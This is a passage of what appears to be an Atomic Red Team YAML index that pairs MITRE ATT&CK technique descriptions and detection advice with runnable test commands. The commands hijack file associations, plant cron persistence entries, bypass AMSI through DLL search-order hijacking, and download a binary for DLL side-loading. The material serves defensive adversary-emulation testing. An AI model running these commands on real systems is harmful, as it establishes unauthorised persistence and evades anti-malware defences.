HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe + values of the keys listed are commands that are executed when the handler + opens the file extension. Adversaries can modify these values to continually + execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)" + name: Change Default File Association + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.001 + url: https://attack.mitre.org/techniques/T1546/001 + - external_id: CAPEC-556 + source_name: capec + url: https://capec.mitre.org/data/definitions/556.html + - url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs + description: Microsoft. (n.d.). Change which programs Windows 7 uses by default. + Retrieved July 26, 2016. + source_name: Microsoft Change Default Programs + - url: http://msdn.microsoft.com/en-us/library/bb166549.aspx + description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. + Retrieved November 13, 2014. + source_name: Microsoft File Handlers + - url: https://docs.microsoft.com/windows-server/administration/windows-commands/assoc + description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August + 7, 2018. + source_name: Microsoft Assoc Oct 2017 + - url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd + description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August + 8, 2018. + source_name: TrendMicro TROJ-FAKEAV OCT 2012 + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_detection: |- + Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. + + User file association preferences are stored under [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys. + + Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1546.001 + atomic_tests: + - name: Change Default File Association + auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 + description: "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon + successful execution, cmd.exe will change the file association of .hta to + notepad.exe. \n" + supported_platforms: + - windows + input_arguments: + target_extension_handler: + description: txtfile maps to notepad.exe + type: Path + default: txtfile + extension_to_change: + description: File Extension To Hijack + type: String + default: ".hta" + original_extension_handler: + description: File Extension To Revert + type: String + default: htafile + executor: + command: 'assoc #{extension_to_change}=#{target_extension_handler} + +' + cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} + +' + name: command_prompt + elevation_required: true + T1078.004: + technique: + id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 + description: |- + Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) + + Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. + name: Cloud Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.004 + url: https://attack.mitre.org/techniques/T1078/004 + - source_name: AWS Identity Federation + url: https://aws.amazon.com/identity/federation/ + description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, + 2020. + - source_name: Google Federating GC + url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction + description: Google. (n.d.). Federating Google Cloud with Active Directory. + Retrieved March 13, 2020. + - source_name: Microsoft Deploying AD Federation + url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs + description: Microsoft. (n.d.). Deploying Active Directory Federation Services + in Azure. Retrieved March 13, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-03-16T12:45:15.399Z' + created: '2020-03-13T20:36:57.378Z' + x_mitre_platforms: + - Azure AD + - Office 365 + - SaaS + - IaaS + - Google Workspace + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal + or malicious behavior, such as accessing information outside of the normal + function of the account or account usage at atypical hours. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' + atomic_tests: [] + T1546.015: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.015 + url: https://attack.mitre.org/techniques/T1546/015 + - url: https://msdn.microsoft.com/library/ms694363.aspx + description: Microsoft. (n.d.). The Component Object Model. Retrieved August + 18, 2016. + source_name: Microsoft Component Object Model + - url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence + description: 'G DATA. (2014, October). COM Object hijacking: the discreet + way of persistence. Retrieved August 13, 2016.' + source_name: GDATA COM Hijacking + - source_name: Elastic COM Hijacking + description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting + Persistence & Evasion with the COM. Retrieved September 15, 2016.' + url: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Component Object Model Hijacking + description: "Adversaries may establish persistence by executing malicious content + triggered by hijacked references to Component Object Model (COM) objects. + COM is a system within Windows to enable interaction between software components + through the operating system.(Citation: Microsoft Component Object Model) + \ References to various COM objects are stored in the Registry. \n\nAdversaries + can use the COM system to insert malicious code that can be executed in place + of legitimate software through hijacking the COM references and relationships + as a means for persistence. Hijacking a COM object requires a change in the + Registry to replace a reference to a legitimate system component which may + cause that component to not work when executed. When that system component + is executed through normal system operation the adversary's code will be executed + instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects + that are used frequently enough to maintain a consistent level of persistence, + but are unlikely to break noticeable functionality within the system as to + avoid system instability that could lead to detection. " + id: attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:19:44.750Z' + created: '2020-03-16T14:12:47.923Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: "There are opportunities to detect COM hijacking by searching + for Registry references that have been replaced and through Registry operations + (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary + paths with unknown paths or otherwise malicious content. Even though some + third-party applications define user COM objects, the presence of objects + within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and + should be investigated since user objects will be loaded prior to machine + objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic + COM Hijacking) Registry entries for existing COM objects may change infrequently. + When an entry with a known good path and binary is replaced or changed to + an unusual value to point to an unknown binary in a new location, then it + may indicate suspicious behavior and should be investigated. \n\nLikewise, + if software DLL loads are collected and analyzed, any unusual DLL load that + can be correlated with a COM object Registry modification may indicate COM + hijacking has been performed. " + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_contributors: + - Elastic + x_mitre_platforms: + - Windows + atomic_tests: [] + T1053.007: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.007 + url: https://attack.mitre.org/techniques/T1053/007 + - source_name: Kubernetes Jobs + url: https://kubernetes.io/docs/concepts/workloads/controllers/job/ + description: The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March + 30, 2021. + - source_name: Kubernetes CronJob + url: https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ + description: The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved + March 29, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container Orchestration Job + description: |- + Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. + + In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes) + id: attack-pattern--1126cab1-c700-412f-a510-61f4937bb096 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-12T18:09:46.821Z' + created: '2021-03-29T17:06:22.247Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: 'Monitor for the anomalous creation of scheduled jobs in + container orchestration environments. Use logging agents on Kubernetes nodes + and retrieve logs from sidecar proxies for application and resource pods to + monitor malicious container orchestration job deployments. ' + x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Container: Container Creation' + - 'File: File Creation' + identifier: T1053.007 + atomic_tests: + - name: ListCronjobs + auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl get cronjobs -n #{namespace} + +' + name: bash + elevation_required: false + - name: CreateCronjob + auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl create -f src/cronjob.yaml -n #{namespace} + +' + cleanup_command: 'kubectl delete cronjob art -n #{namespace} + +' + name: bash + elevation_required: false + T1134.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1134.002 + url: https://attack.mitre.org/techniques/T1134/002 + - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing + description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved + April 21, 2017. + source_name: Microsoft Command-line Logging + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Create Process with Token + description: Adversaries may create a new process with a duplicated token to + escalate privileges and bypass access controls. An adversary can duplicate + a desired access token with DuplicateToken(Ex) and use it with + CreateProcessWithTokenW to create a new process running under + the security context of the impersonated user. This is useful for creating + a new process under the security context of a different user. + id: attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-26T21:28:19.476Z' + created: '2020-02-18T16:48:56.582Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_defense_bypassed: + - Windows User Account Control + - System access controls + - File system access controls + x_mitre_detection: |- + If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) + + If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. + + Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1543: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543 + url: https://attack.mitre.org/techniques/T1543 + - url: https://technet.microsoft.com/en-us/library/cc772408.aspx + description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. + source_name: TechNet Services + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Create or Modify System Process + description: "Adversaries may create or modify system-level processes to repeatedly + execute malicious payloads as part of persistence. When operating systems + boot up, they can start processes that perform background system functions. + On Windows and Linux, these system processes are referred to as services. + (Citation: TechNet Services) On macOS, launchd processes known as [Launch + Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) + are run to finish system initialization and load user specific parameters.(Citation: + AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, + daemons, or agents that can be configured to execute at startup or a repeatable + interval in order to establish persistence. Similarly, adversaries may modify + existing services, daemons, or agents to achieve the same effect. \n\nServices, + daemons, or agents may be created with administrator privileges but executed + under root/SYSTEM privileges. Adversaries may leverage this functionality + to create or modify system processes in order to escalate privileges. (Citation: + OSX Malware Detection). " + id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.922Z' + created: '2020-01-10T16:03:18.865Z' + x_mitre_data_sources: + - 'Service: Service Creation' + - 'Service: Service Modification' + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_detection: "Monitor for changes to system processes that do not correlate + with known software, patch cycles, etc., including by comparing results against + a trusted system baseline. New, benign system processes may be created during + installation of new software. Data and events should not be viewed in isolation, + but as part of a chain of behavior that could lead to other activities, such + as network connections made for Command and Control, learning details about + the environment through Discovery, and Lateral Movement. \n\nCommand-line + invocation of tools capable of modifying services may be unusual, depending + on how systems are typically used in a particular environment. Look for abnormal + process call trees from known services and for execution of other commands + that could relate to Discovery or other adversary techniques. \n\nMonitor + for changes to files associated with system-level processes." + x_mitre_platforms: + - Windows + - macOS + - Linux + atomic_tests: [] + T1053.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.003 + url: https://attack.mitre.org/techniques/T1053/003 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Cron + description: |- + Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. + + An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. + id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T23:30:46.546Z' + created: '2019-12-03T14:25:00.538Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: false + x_mitre_permissions_required: + - User + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement. " + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - Linux + - macOS + identifier: T1053.003 + atomic_tests: + - name: Cron - Replace crontab with referenced file + auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 + description: 'This test replaces the current user''s crontab file with the contents + of the referenced file. This technique was used by numerous IoT automated + exploitation attacks. + +' + supported_platforms: + - macos + - linux + input_arguments: + command: + description: Command to execute + type: string + default: "/tmp/evil.sh" + tmp_cron: + description: Temporary reference file to hold evil cron schedule + type: path + default: "/tmp/persistevil" + executor: + name: bash + command: | + crontab -l > /tmp/notevil + echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} + cleanup_command: 'crontab /tmp/notevil + +' + - name: Cron - Add script to all cron subfolders + auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. + +' + supported_platforms: + - macos + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. + +' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} + +' + T1574.001: + technique: + id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 + description: |- + Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. + + There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) + + Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) + + If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. + name: DLL Search Order Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.001 + url: https://attack.mitre.org/techniques/T1574/001 + - external_id: CAPEC-471 + source_name: capec + url: https://capec.mitre.org/data/definitions/471.html + - source_name: Microsoft Dynamic Link Library Search Order + url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. + Retrieved November 30, 2014. + - source_name: FireEye Hijacking July 2010 + url: https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html + description: Harbour, N. (2010, July 15). Malware Persistence without the + Windows Registry. Retrieved November 17, 2020. + - source_name: OWASP Binary Planting + description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, + 2016. + url: https://www.owasp.org/index.php/Binary_planting + - source_name: FireEye fxsst June 2011 + url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html + description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November + 17, 2020. + - source_name: Microsoft Security Advisory 2269637 + url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 + description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved + March 13, 2020. + - source_name: Microsoft Dynamic-Link Library Redirection + url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. + Retrieved March 13, 2020. + - source_name: Microsoft Manifests + description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. + url: https://msdn.microsoft.com/en-US/library/aa375365 + - source_name: FireEye DLL Search Order Hijacking + url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html + description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking + Revisited. Retrieved March 13, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-26T18:37:03.748Z' + created: '2020-03-13T18:11:08.357Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: Monitor file systems for moving, renaming, replacing, or + modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared + with past behavior) that do not correlate with known software, patches, etc., + are suspicious. Monitor DLLs loaded into a process and detect DLLs that have + the same file name but abnormal paths. Modifications to or creation of `.manifest` + and `.local` redirection files that do not correlate with software updates + are suspicious. + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1574.001 + atomic_tests: + - name: DLL Search Order Hijacking - amsi.dll + auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + description: | + Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) + https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ + + Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. + supported_platforms: + - windows + executor: + command: | + copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe + copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll + %APPDATA%\updater.exe -Command exit + cleanup_command: | + del %APPDATA%\updater.exe >nul 2>&1 + del %APPDATA%\amsi.dll >nul 2>&1 + name: command_prompt + elevation_required: true + T1574.002: + technique: + created: '2020-03-13T19:41:37.908Z' + modified: '2021-04-26T18:31:34.954Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.002 + url: https://attack.mitre.org/techniques/T1574/002 + - external_id: CAPEC-641 + source_name: capec + url: https://capec.mitre.org/data/definitions/641.html + - source_name: FireEye DLL Side-Loading + url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf + description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in + the Side of the Anti-Virus Industry. Retrieved March 13, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: DLL Side-Loading + description: |- + Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). + + Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) + id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor processes for unusual activity (e.g., a process that + does not use the network begins to do so) as well as the introduction of new + files/programs. Track DLL metadata, such as a hash, and compare DLLs that + are loaded at process execution time against previous executions to detect + differences that do not correlate with patching or updates. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + x_mitre_platforms: + - Windows + identifier: T1574.002 + atomic_tests: + - name: DLL Side-Loading using the Notepad++ GUP.exe binary + auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 + description: | + GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. + Upon execution, calc.exe will be opened. + supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: string + default: calculator.exe + gup_executable: + description: GUP is an open source signed binary used by Notepad++ for software + updates + type: path + default: PathToAtomicsFolder\T1574.002\bin\GUP.exe + dependency_executor_name: powershell + dependencies: + - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) + +' + prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" + executor: + command: "#{gup_executable}\n" + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + +' + name: command_prompt + T1078.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1078.001 + url: https://attack.mitre.org/techniques/T1078/001 + - external_id: CAPEC-70 + source_name: capec + url: https://capec.mitre.org/data/definitions/70.html + - source_name: Microsoft Local Accounts Feb 2019 + url: 